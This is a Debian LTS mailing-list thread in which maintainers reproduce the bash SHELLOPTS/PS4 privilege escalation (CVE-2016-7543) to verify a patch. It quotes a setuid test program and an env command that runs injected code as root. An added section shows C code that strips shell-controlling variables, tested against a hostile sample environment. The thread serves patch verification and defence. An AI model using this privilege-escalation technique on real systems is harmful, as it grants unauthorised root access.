Hi Balint

It was the default shell that made the difference. Thanks again for this suggestion. I can reproduce the problem now. Very good.

An interesting note is that it is only possible to escalate the privilege to root. If I change the owner of the file to www-data (and the setuid to 33) the id command is not executed as www-data. This means that the bash fix to only make a special case for root is good. I thought maybe the fix was incomplete.

I'll look into the fixing part now. I have found the patch and it looks trivial. As I can reproduce it easily now (with changed default shell to bash) it should be trivial to verify whether the correction was good or not.

Best regards

// Ola

On 7 October 2016 at 09:26, Bálint Réczey <[email protected]> wrote:
> Hi,
>
> 2016-10-07 8:10 GMT+02:00 Ola Lundqvist <[email protected]>:
> > Hi Balint
> >
> > Ah, it could be the default shell. I'll try that. Thanks for the suggestion.
> >
> > Merely that the command id is executed is not a reproduction. It has to be
> > executed as another user than the one executing the binary to be a
> > security problem. If not it could be a bug but not a security bug (privilege
> > escalation).
>
> True, but it works on setuid binaries, too:
>
> root@debian-wheezy:/home/vagrant# ls -alh /bin/sh
> lrwxrwxrwx 1 root root 4 Oct 7 07:16 /bin/sh -> bash
> root@debian-wheezy:/home/vagrant# gcc -xc - -otest <<< 'int main() { setuid(0); system("/bin/date"); }'
> root@debian-wheezy:/home/vagrant# chmod 4755 ./test
> root@debian-wheezy:/home/vagrant# ls -l ./test
> -rwsr-xr-x 1 root root 6877 Oct 7 07:19 ./test
> root@debian-wheezy:/home/vagrant# exit
> exit
> vagrant@debian-wheezy:~$ env -i SHELLOPTS=xtrace PS4='$(id)' ./test
> uid=0(root) gid=1000(vagrant) groups=0(root),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(vid/bin/date
> Fri Oct 7 07:19:34 GMT 2016
> vagrant@debian-wheezy:~$
>
> Cheers,
> Balint
>
> >
> > Best regards,
> >
> > // Ola
> >
> > On 7 October 2016 at 00:12, Bálint Réczey <[email protected]> wrote:
> >>
> >> Hi Ola,
> >>
> >> 2016-10-06 23:08 GMT+02:00 Ola Lundqvist <[email protected]>:
> >> > Hi Matthias and Balint
> >> >
> >> > I have tried to reproduce the problem described in the openwall email.
> >> > However I can not reproduce it. Have you been able to?
> >> >
> >> > On wheezy:
> >> > ------------
> >> > ola@tigereye:/$ env -i SHELLOPTS=xtrace PS4='$(id)' ./test
> >> > Thu Oct 6 20:54:07 UTC 2016
> >> > ola@tigereye:/$ ls -la test
> >> > -rwsr-xr-x 1 root root 6824 Oct 6 20:52 test
> >> > ola@tigereye:/$ dpkg -l bash
> >> > ...CUT...
> >> > ii bash 4.2+dfsg-0.1 amd64 GNU Bourne Again SHell
> >> >
> >> > On jessie:
> >> > ola@tigereye:~/exploit$ env -i SHELLOPTS=xtrace PS4='$(id)' ./test
> >> > Thu Oct 6 22:48:35 CEST 2016
> >>
> >> When I set the default shell to bash it worked for me.
> >> Please try with sudo dpkg-reconfigure dash.
> >>
> >> > ola@tigereye:~/exploit$ dpkg -l bash
> >> > ...CUT...
> >> > ii bash 4.3-11+b1 amd64 GNU Bourne Again SHell
> >> >
> >> > I think it may be because SHELLOPTS is a read-only variable.
> >> >
> >> > ola@tigereye:~/exploit$ SHELLOPTS=xtrace
> >> > bash: SHELLOPTS: readonly variable
> >> >
> >> > Do you think I have made a mistake in the reproduction or is it so that the
> >> > patch was actually not on a real problem (at least in Debian).
> >> >
> >> > Not even if I change the code like this:
> >> > ola@tigereye:~/exploit$ gcc -xc - -otest2 <<< 'int main() { setuid(0); system("/bin/bash -c /bin/date"); }'
> >> > ola@tigereye:~/exploit$ ./test2
> >> > Thu Oct 6 23:04:11 CEST 2016
> >> > ola@tigereye:~/exploit$ set -x
> >> > ola@tigereye:~/exploit$ ./test2
> >> > uid=1000(ola) gid=1000(ola) groups=1000(ola),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),108(netdev)./test2
> >> > Thu Oct 6 23:04:18 CEST 2016
> >>
> >> This runs the command passed in PS4 thus I consider this a reproduction.
> >>
> >> Cheers,
> >> Balint
> >>
> >> >
> >> > My conclusion is that there is no security hole. But I may be mistaken.
> >> >
> >> > Can anyone else reproduce the issue?
> >> >
> >> > Best regards,
> >> >
> >> > // Ola
> >> >
> >> > On 6 October 2016 at 12:29, Ola Lundqvist <[email protected]> wrote:
> >> >>
> >> >> Hi Matthias
> >> >>
> >> >> I will look into this.
> >> >>
> >> >> // Ola
> >> >>
> >> >> On 6 October 2016 at 01:06, Matthias Klose <[email protected]> wrote:
> >> >>>
> >> >>> On 05.10.2016 16:02, Balint Reczey wrote:
> >> >>> > Hello dear maintainer(s),
> >> >>> >
> >> >>> > the Debian LTS team would like to fix the security issues which are
> >> >>> > currently open in the Wheezy version of bash:
> >> >>> > https://security-tracker.debian.org/tracker/CVE-2016-7543
> >> >>> >
> >> >>> > Would you like to take care of this yourself?
> >> >>>
> >> >>> please go ahead.
> >> >>>
> >> >>> Matthias
> >> >>>
> >> >>
> >> >
> >
>

--
--- Inguza Technology AB --- MSc in Information Technology ----
/  [email protected]                    Folkebogatan 26            \
|  [email protected]                    654 68 KARLSTAD            |
|  http://inguza.com/                   Mobile: +46 (0)70-332 1551  |
\  gpg/f.p.: 7090 A92B 18FE 7994 0C36 4FE4 18A1 B1CF 0FE5 3DD9  /
---------------------------------------------------------------
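The reproductions above all rely on a setuid root binary calling system(), which hands the caller's SHELLOPTS and PS4 straight to /bin/sh. The bash patch being discussed closes that on the shell side; the program side has its own, independent mitigation. The following is an added example, not code from this thread or from the bash package: it shows a privileged helper running an external command through execve() with an explicitly constructed environment, so that shell-controlling variables never reach a child shell at all. The function names (build_clean_env, is_shell_controlling_var, run_with_clean_env), the allowlist of forwarded variables and the sample hostile environment are this example's own choices.

```c
/* Added example (not from the thread): caller-side mitigation for the
 * SHELLOPTS/PS4 scenario. A privileged program should not use system()
 * (it always runs "/bin/sh -c ..."), and should give any child an
 * explicitly built environment instead of its inherited one.
 * Function names and the allowlist below are this example's own. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/wait.h>

/* Variables that change how a shell parses, traces or initialises itself.
 * With bash as /bin/sh, SHELLOPTS=xtrace plus a PS4 containing $(...) makes
 * the child shell expand and run that substitution (CVE-2016-7543). */
static const char *const shell_control_vars[] = {
    "SHELLOPTS", "BASHOPTS", "PS4", "BASH_ENV", "ENV", "IFS", NULL
};

/* Return 1 if "NAME=value" names one of the shell-controlling variables.
 * The comparison is on the exact name, so "PS4x=1" is not flagged. */
int is_shell_controlling_var(const char *kv)
{
    const char *eq = strchr(kv, '=');
    size_t name_len = eq ? (size_t)(eq - kv) : strlen(kv);
    for (int i = 0; shell_control_vars[i] != NULL; i++) {
        if (strlen(shell_control_vars[i]) == name_len &&
            strncmp(shell_control_vars[i], kv, name_len) == 0)
            return 1;
    }
    return 0;
}

/* Build an allowlisted environment for a privileged child:
 *   - PATH is always replaced by a fixed, trusted value;
 *   - only the variables named in 'keep' are copied from 'inherited';
 *   - everything else, including the denylist above, is dropped.
 * 'out' receives at most max-1 pointers plus a terminating NULL.
 * Returns the number of entries written (excluding the NULL). */
size_t build_clean_env(char *const *inherited, char **out, size_t max)
{
    static const char *const keep[] = { "TZ", "LANG", NULL };
    static char path_entry[] = "PATH=/usr/bin:/bin";
    size_t n = 0;
    if (max < 2) { if (max) out[0] = NULL; return 0; }
    out[n++] = path_entry;
    for (size_t i = 0; inherited[i] != NULL && n < max - 1; i++) {
        const char *kv = inherited[i];
        if (is_shell_controlling_var(kv))
            continue;                 /* never forwarded, whatever the allowlist says */
        const char *eq = strchr(kv, '=');
        if (eq == NULL)
            continue;                 /* malformed entry, drop it */
        size_t name_len = (size_t)(eq - kv);
        for (int k = 0; keep[k] != NULL; k++) {
            if (strlen(keep[k]) == name_len && strncmp(keep[k], kv, name_len) == 0) {
                out[n++] = (char *)kv;
                break;
            }
        }
    }
    out[n] = NULL;
    return n;
}

/* Run a fixed binary directly (no shell) with the clean environment.
 * Returns the child's exit status, or -1 on failure. */
int run_with_clean_env(const char *path, char *const argv[], char *const *inherited)
{
    char *clean[16];
    build_clean_env(inherited, clean, sizeof clean / sizeof clean[0]);
    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        execve(path, argv, clean);    /* absolute path, no PATH lookup, no "/bin/sh -c" */
        _exit(127);
    }
    int status;
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

/* Self-check on a constructed hostile environment (the same variables an
 * attacker would pass via "env -i ..."): only the fixed PATH and TZ survive. */
int clean_env_selfcheck(void)
{
    char *hostile[] = { "SHELLOPTS=xtrace", "PS4=$(id)", "PATH=/tmp/evil:/usr/bin", "TZ=UTC", NULL };
    char *clean[8];
    size_t n = build_clean_env(hostile, clean, 8);
    return n == 2 && strcmp(clean[0], "PATH=/usr/bin:/bin") == 0
        && strcmp(clean[1], "TZ=UTC") == 0 && clean[2] == NULL;
}

int main(void)
{
    char *hostile[] = { "SHELLOPTS=xtrace", "PS4=$(id)", "PATH=/tmp/evil:/usr/bin", "TZ=UTC", NULL };
    char *argv[] = { "date", NULL };
    printf("self-check: %s\n", clean_env_selfcheck() ? "ok" : "FAILED");
    /* /bin/date runs with PATH and TZ only; SHELLOPTS and PS4 never reach it. */
    return run_with_clean_env("/bin/date", argv, hostile) == 0 ? 0 : 1;
}
```

The allowlist is deliberately tiny; a real helper adds only the variables it has a documented need for. Note that this does not replace the bash fix: any other setuid program on the system that still calls system() remains exposed until the shell itself stops honouring SHELLOPTS and PS4 when running with elevated privileges.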
